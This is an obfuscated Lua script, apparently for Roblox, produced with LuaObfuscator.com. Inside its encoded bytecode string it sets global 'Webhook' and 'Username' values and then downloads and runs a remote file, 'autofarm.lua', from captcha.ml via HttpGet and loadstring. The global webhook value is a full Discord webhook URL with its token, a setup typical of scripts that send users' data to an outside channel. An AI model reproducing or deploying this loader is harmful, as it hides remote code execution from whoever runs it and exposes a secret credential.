--[[

 .____                  ________ ___.    _____                           __                

 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 

 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \

 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/

 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   

         \/          \/         \/    \/                \/     \/     \/                   

          \_Welcome to LuaObfuscator.com   (Alpha 0.2.1) ~  Much Love, Ferib 

]]--

do local v0=0;local v1;local v2;local v3;local v4;local v5;local v6;local v7;local v8;local v9;local v10;local v11;local v12;local v13;local v14;local v15;local v16;while true do if (v0==2) then v7=table.concat;v8=table.insert;v9=math.ldexp;v0=3;end if (v0==3) then v10=getfenv or function()return _ENV;end;v11=setmetatable;v12=pcall;v0=4;end if (v0==5) then v16=nil;v16=function(v20,v21,...)local v27=0;local v28;local v29;local v30;local v31;local v32;local v33;local v34;local v35;local v36;local v37;local v38;local v39;while true do if (v27==5) then v39=nil;v39=function(v40,v41,v42)local v48=v40[1];local v49=v40[2];local v50=v40[3];return function(...)local v77=0;local v78;local v79;local v80;local v81;local v82;while true do if (v77==3) then A,B=v37(v12(v82));if  not A[1] then local v102=v40[4][v78] or "?";error("Script error at ["   .. v102   .. "]:"   .. A[2]);else return v14(A,2,B);end break;end if (v77==2) then v82=nil;v82=function()local v92=v48;local v93=v49;local v94=v50;local v95=v37;local v96={};local v97={};local v98={};for v103=0,v81 do if ((v103>=v94) or ((12434 -8785)==(1967 + 59))) then v96[v103-v94]=v80[v103 + 1];else v98[v103]=v80[v103 + (738 -(148 + 589))];end end local v99=(v81-v94) + 1 + 0;local v100;local v101;while true do local v104=1366 -(69 + 1297);local v105;while true do if ((v104==(320 -(176 + 144))) or ((9058 -5848)<(3659 -(2824 -(560 + 131))))) then v105=0;while true do if ((2857>(6864 -4228)) and (v105==(0 + 0))) then local v116=0;local v117;while true do if ((((5589 -1730) -2457)<(1129 + 506 + 87)) and (v116==(926 -((1949 -(988 + 136)) + 101)))) then v117=0;while true do if (((10338 -7454)<=((3762 + 1755) -(345 + 1539))) and (v117==(0 -0))) then v100=v92[v78];v101=v100[1943 -(978 + 964)];v117=2 -1;end if (((3963 -(53 + 195))==((5500 -(671 + 1202)) + 88)) and (((1146 -(291 + 852)) -2)==v117)) then v105=1 + 0 + 0;break;end end break;end end end if ((3130>=(1141 + 1248)) and (v105==(681 -(544 + (994 -(652 + 206)))))) then if (((3708 + 842)>(125 + 726)) and (v101<=(3 + 0 + 1))) then if ((v101<=1) or ((7952 -4227)<(3117 -(2758 -2080)))) then if ((v101==(0 -0)) or ((2206 -(605 -(23 + 88)))>2250)) then v98[v100[5 -3]]();else local v125=1671 -(958 + 713);local v126;local v127;while true do if (((874 -546)<(1337 + 11)) and (v125==0)) then v126=v100[671 -(284 + 385)];v127=v98[v100[11 -8]];v125=1 + 0;end if ((v125==(1 + 0)) or (1934>=((11028 -(829 + 778)) -4692))) then v98[v126 + (1 -0) + 0 + 0]=v127;v98[v126]=v127[v100[2 + (1694 -(691 + 1001))]];break;end end end elseif ((4165==((6324 -(816 + 986)) -(249 + 108))) and (v101<=(4 -2))) then local v128=0 -0;local v129;local v130;while true do if ((3985>=2715) and (v128==1)) then while true do if (((0 + 0)==v129) or ((16106 -11478)<(113 + 133 + 163))) then v130=v100[1 + 1];v98[v130]=v98[v130](v14(v98,v130 + 1 + (156 -(125 + 31)),v79));break;end end break;end if ((v128==0) or ((8875 -6659)<=(84 + 20))) then v129=0 -0;v130=nil;v128=1;end end elseif ((v101==(2 + 1)) or ((11 + 309 + 1336)>(7695 -(22225 -16263)))) then local v143=(824 -(596 + 228)) + 0;local v144;local v145;local v146;local v147;local v148;while true do if ((v143==(211 -(158 + 51))) or ((6853 -(1656 + 324))<(2595 -(1473 + 302)))) then v148=nil;while true do if ((311==((308 -222) + 225)) and (2==v144)) then for v172=v145,v79 do local v173=0;while true do if ((v173==(0 + 0)) or ((678 -295)>(5281 -(1093 + 200)))) then v148=v148 + (2 -(1 -0));v98[v172]=v146[v148];break;end end end break;end if ((v144==(0 + (562 -(488 + 74)))) or ((518 + 445)>=(15552 -11616))) then v145=v100[82 -(7 + 73)];v146,v147=v95(v98[v145](v14(v98,v145 + ((2086 -(262 + 127)) -(959 + 737)),v100[7 -4])));v144=1 -0;end if (((152 + 71 + 1948)==(3179 -(259 + 749))) and (v144==(1 + 0 + 0))) then v79=(v147 + v145) -(35 -(4 + 30));v148=0 -0;v144=(5 -2) -1;end end break;end if (((1 -0)==v143) or ((620 + 1100)==(67 + 642))) then v146=nil;v147=nil;v143=2 -0;end if (((2217 + 1419)<=((12052 -7551) -(59 + 136))) and (v143==(0 + 0))) then v144=0 + 0;v145=nil;v143=1 + 0 + 0;end end else v98[v100[218 -(215 + 1)]][v100[3 + 0]]=v100[(1564 -(737 + 814)) -9];end elseif ((717>(321 + 317)) and (v101<=(1744 -(317 + 1421)))) then if (((8151 -4423)<(3999 + 249)) and (v101==(1240 -(379 + 856)))) then v98[v100[(2 -1) + 1]]=v100[2 + 1];elseif ((v98[v100[2 + 0]]==v100[1438 -((1304 -(385 + 152)) + 667)]) or ((6273 -(147 + 1242))==(6032 -(472 + 1267)))) then v78=v78 + ((363 -232) -(129 + 1));else v78=v100[1178 -(1077 + 98)];end elseif ((v101<=(10 -3)) or ((4538 -(896 + 26))>=(2414 + 1984))) then v98[v100[1873 -(1268 + 603)]]=v42[v100[1867 -((3105 -(1210 + 310)) + 279)]];elseif ((v101==(22 -14)) or (3828<=((4341 -(79 + 1245)) -(520 + 886)))) then do return;end else v78=v100[7 -4];end v78=v78 + (1377 -(343 + 1033));break;end end break;end end end end;v77=3;end if (v77==0) then v78=1;v79= -1;v77=1;end if (v77==1) then v80={...};v81=v13("#",...) -1;v77=2;end end end;end;return v39(v38(),{},v21)(...);end if (v27==4) then v37=nil;v37=function(...)return {...},v13("#",...);end;v38=nil;v38=function()local v51=0;local v52;local v53;local v54;local v55;local v56;local v57;local v58;local v59;while true do if (v51==(2 + 2)) then while true do if (v52~=(1 + 0)) then else v55=nil;v56=nil;v52=1 + 1;end if (v52~=(4 -1)) then else v59=nil;while true do local v109=197 -(170 + 27);local v110;while true do if ((0 + 0)~=v109) then else v110=0 + 0;while true do if (v110==(1 + 0)) then if (v53~=2) then else local v120=0;while true do if (v120==(0 -0)) then local v135=0;while true do if (v135~=0) then else for v162=1,v58 do local v163=0;local v164;local v165;local v166;while true do if (v163~=0) then else v164=1502 -(1432 + 70);v165=nil;v163=1623 -(714 + 908);end if (v163~=(3 -2)) then else v166=nil;while true do if (v164~=0) then else local v175=0;while true do if (v175==0) then local v186=0 -0;while true do if (v186~=(0 -0)) then else v165=v31();v166=nil;v186=1;end if (v186~=(1 + 0)) then else v175=1;break;end end end if (v175~=(1 + 0)) then else v164=3 -2;break;end end end if (v164==(1 + 0)) then if (v165==1) then v166=v31()~=0;elseif (v165==2) then v166=v34();elseif (v165==(1123 -(915 + 205))) then v166=v35();end v59[v162]=v166;break;end end break;end end end v57[3]=v31();v135=1 + 0;end if (v135~=1) then else v120=1618 -(280 + 1337);break;end end end if (v120==1) then for v136=1,v33() do local v137=0;local v138;local v139;local v140;while true do if (v137==(0 + 0)) then local v167=0;while true do if (v167~=1) then else v137=1415 -(152 + 1262);break;end if (0~=v167) then else v138=0 -0;v139=nil;v167=1;end end end if (v137==(249 -(66 + 182))) then v140=nil;while true do if (v138==(0 + 0)) then v139=0;v140=nil;v138=1;end if (v138==(1125 -(410 + 714))) then while true do if (v139~=(774 -(175 + 599))) then else v140=v31();if (v30(v140,780 -(26 + 753),1)~=0) then else local v179=0;local v180;local v181;local v182;local v183;local v184;while true do if (v179==(1393 -(927 + 466))) then v180=0;v181=nil;v179=1 + 0;end if (v179==1) then v182=nil;v183=nil;v179=2 + 0;end if (v179==(4 -2)) then v184=nil;while true do if (v180~=0) then else local v191=0 + 0;while true do if (v191==1) then v180=1;break;end if (v191~=(0 + 0)) then else v181=0;v182=nil;v191=1;end end end if (2~=v180) then else while true do if (v181~=3) then else if (v30(v183,1 + 2,3)==(1 + 0)) then v184[4]=v59[v184[3 + 1]];end v54[v136]=v184;break;end if (v181~=(1 + 0)) then else local v194=0;while true do if (v194==(1 + 0)) then v181=2;break;end if (v194~=(716 -(298 + 418))) then else v184={v32(),v32(),nil,nil};if (v182==(0 -0)) then local v199=0 + 0;local v200;local v201;while true do if (v199==(1327 -(19 + 1307))) then while true do if (v200~=0) then else v201=0;while true do if (v201==(0 + 0)) then v184[6 -3]=v32();v184[16 -12]=v32();break;end end break;end end break;end if (v199~=0) then else v200=0;v201=nil;v199=1 + 0;end end elseif (v182==(1 + 0)) then v184[3]=v33();elseif (v182==(48 -(16 + 30))) then v184[2 + 1]=v33() -((645 -(407 + 236))^(1012 -(206 + 790)));elseif (v182~=3) then else local v208=1604 -(239 + 1365);local v209;while true do if (v208~=(0 -0)) then else v209=0;while true do if (v209==(0 -0)) then v184[159 -(149 + 7)]=v33() -(2^16);v184[5 -1]=v32();break;end end break;end end end v194=4 -3;end end end if (v181==0) then local v195=0;while true do if (v195==(0 -0)) then v182=v30(v140,5 -3,1153 -(431 + 719));v183=v30(v140,11 -7,4 + 2);v195=220 -(37 + 182);end if (v195~=(1422 -(1186 + 235))) then else v181=1 -0;break;end end end if (v181==2) then local v196=0;while true do if (v196==(2 -1)) then v181=5 -2;break;end if (v196~=0) then else if (v30(v183,1 + 0,2 -1)~=1) then else v184[2]=v59[v184[2]];end if (v30(v183,2,2)~=(1 + 0)) then else v184[3]=v59[v184[5 -2]];end v196=1;end end end end break;end if (v180==(1 + 0)) then local v192=0 -0;while true do if (v192~=(394 -(220 + 174))) then else v183=nil;v184=nil;v192=1;end if (1==v192) then v180=2;break;end end end end break;end end end break;end end break;end end break;end end end v53=3;break;end end end if (v53~=3) then else local v121=0 -0;local v122;while true do if (v121~=(0 + 0)) then else v122=0 -0;while true do local v141=641 -(412 + 229);local v142;while true do if ((0 -0)~=v141) then else v142=0;while true do if (0~=v142) then else if (v122==0) then local v174=0;while true do if (v174==(1 + 0)) then v122=1;break;end if (v174==(0 -0)) then local v185=0;while true do if (v185==1) then v174=1;break;end if ((0 -0)==v185) then for v187=1 + 0,v33() do v55[v187-1]=v38();end for v189=295 -(67 + 227),v33() do v56[v189]=v33();end v185=1;end end end end end if (v122~=(1932 -(1264 + 667))) then else return v57;end break;end end break;end end end break;end end end break;end if (v110~=(0 -0)) then else local v118=195 -(5 + 190);local v119;while true do if (v118==(0 + 0)) then v119=0;while true do if (v119~=(0 + 0)) then else if ((3 -2)~=v53) then else local v159=0;local v160;while true do if (v159~=(0 -0)) then else v160=0;while true do if (v160==(1 + 0)) then v59={};v53=2;break;end if (0~=v160) then else v57={v54,v55,nil,v56};v58=v33();v160=4 -3;end end break;end end end if (0~=v53) then else local v161=0 + 0;while true do if (v161~=1) then else v56={};v53=568 -(16 + 551);break;end if (v161~=(141 -(33 + 108))) then else local v170=0;while true do if (v170==1) then v161=3 -2;break;end if (v170==(0 -0)) then v54={};v55={};v170=1;end end end end end v119=57 -(23 + 33);end if (v119~=(752 -(273 + 478))) then else v110=16 -(14 + 1);break;end end break;end end end end break;end end end break;end if (v52==0) then local v106=490 -(99 + 391);local v107;while true do if (v106==0) then v107=0;while true do if (v107~=(1238 -(21 + 1216))) then else v52=1 + 0;break;end if (v107~=(0 -0)) then else v53=0 -0;v54=nil;v107=1;end end break;end end end if (v52~=2) then else local v108=0;while true do if (v108~=(1843 -(260 + 1583))) then else v57=nil;v58=nil;v108=1 + 0;end if (v108==(1 + 0)) then v52=3;break;end end end end break;end if (v51==3) then v58=nil;v59=nil;v51=231 -(178 + 49);end if (v51==(998 -(276 + 720))) then v56=nil;v57=nil;v51=3;end if (1~=v51) then else v54=nil;v55=nil;v51=1 + 1;end if (v51==(608 -(73 + 535))) then v52=0;v53=nil;v51=1;end end end;v27=5;end if (v27==0) then v28=1;v29=nil;v20=v5(v4(v20,5),"..",function(v43)if (v2(v43,2)==79) then v29=v1(v4(v43,1,1));return "";else local v83=0;local v84;while true do if (v83==0) then v84=v3(v1(v43,16));if v29 then local v111=v6(v84,v29);v29=nil;return v111;else return v84;end break;end end end end);v30=nil;v27=1;end if (v27==2) then v32=function()local v60,v61=v2(v20,v28,v28 + (1618 -(1258 + 358)));v28=v28 + 1 + 1;return (v61 * (219 + 37)) + v60;end;v33=nil;v33=function()local v62,v63,v64,v65=v2(v20,v28,v28 + (771 -(373 + 395)));v28=v28 + (19 -15);return (v65 * (12555281 + (15179931 -10957996))) + (v64 * (224134 -158598)) + (v63 * (70 + 186)) + v62;end;v34=nil;v27=3;end if (v27==1) then v30=function(v44,v45,v46)if v46 then local v85=0 -0;local v86;while true do if (v85==(0 -0)) then v86=(v44/(2^(v45-1)))%((231 -((158 -(25 + 66)) + 162))^(((v46-(1713 -(1365 + 347))) -(v45-(2 -(3 -2)))) + (2 -1)));return v86-(v86%(957 -(776 + 180)));end end else local v87=0 + 0;local v88;while true do if (v87==(0 -0)) then v88=2^(v45-(302 -(300 + 1)));return (((v44%(v88 + v88))>=v88) and (1 + 0)) or (0 -0);end end end end;v31=nil;v31=function()local v66=0 + 0;local v67;while true do if (1==v66) then return v67;end if (v66==(96 -(32 + 64))) then v67=v2(v20,v28,v28);v28=v28 + (160 -(87 + 39 + 33));v66=1 + 0;end end end;v32=nil;v27=2;end if (v27==3) then v34=function()local v68=v33();local v69=v33();local v70=1360 -((1914 -945) + 390);local v71=(v30(v69,(1453 -(162 + 1290)) + 0,20) * ((1298 -(560 + 736))^(18 + 14))) + v68;local v72=v30(v69,38 -17,526 -(64 + 431));local v73=((v30(v69,10 + 22)==(1 -0)) and  -(782 -(357 + 424))) or (2 -1);if (v72==(0 + 0)) then if (v71==(0 -0)) then return v73 * (0 -0);else local v89=0 -(0 -0);while true do if (v89==((473 -(441 + 32)) -0)) then v72=(895 -(490 + 403)) -1;v70=390 -(285 + 105);break;end end end elseif (v72==(201 + 1846)) then return ((v71==(0 + 0)) and (v73 * (((1 -0) + 0)/0))) or (v73 * NaN);end return v9(v73,v72-(4986 -3963)) * (v70 + (v71/((2 + 0)^(15 + 37))));end;v35=nil;v35=function(v47)local v74=0 + 0;local v75;local v76;while true do if (v74==(1264 -(649 + 614))) then v75=v4(v20,v28,(v28 + v47) -((1111 -(415 + 695)) + 0));v28=v28 + v47;v74=(1837 -(1733 + 101)) -1;end if ((0 -0)==v74) then v75=nil;if  not v47 then v47=v33();if (v47==(0 -(1251 -(681 + 570)))) then return "";end end v74=1;end if (v74==(246 -(176 + 68))) then v76={};for v90=1 + 0, #v75 do v76[v90]=v3(v2(v4(v75,v90,v90)));end v74=3;end if (v74==(1 + 2)) then return v7(v76);end end end;v36=v33;v27=4;end end end;v16("LOL!0B3O00028O00026O00F03F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574031F3O00682O7470733A2O2F636170746368612E6D6C2F6175746F6661726D2E6C756103023O005F4703073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F313036393634373035383531333936313037332F76456F5871577473706C5164505248505869784E74574547646F4A624D326E7539372D5F35724150764E6643344F547566753562754D2D555F7A506C4759412D422D786B03083O00557365726E616D6503083O00456479312O32393500143O0012053O00013O0026063O000B000100020004093O000B0001001207000100033O001207000200043O002001000200020005001205000400064O0003000200044O000200013O00024O0001000100010004093O001300010026063O0001000100010004093O00010001001207000100073O003004000100080009001207000100073O0030040001000A000B0012053O00023O0004093O000100012O00083O00017O00143O00023O00043O00043O00053O00053O00053O00053O00053O00053O00053O00063O00083O00083O00093O00093O000A3O000A3O000B3O000C3O000E3O00",v10(),...);break;end if (v0==4) then v13=select;v14=unpack or table.unpack;v15=tonumber;v0=5;end if (v0==0) then v1=tonumber;v2=string.byte;v3=string.char;v0=1;end if (v0==1) then v4=string.sub;v5=string.gsub;v6=string.rep;v0=2;end end end
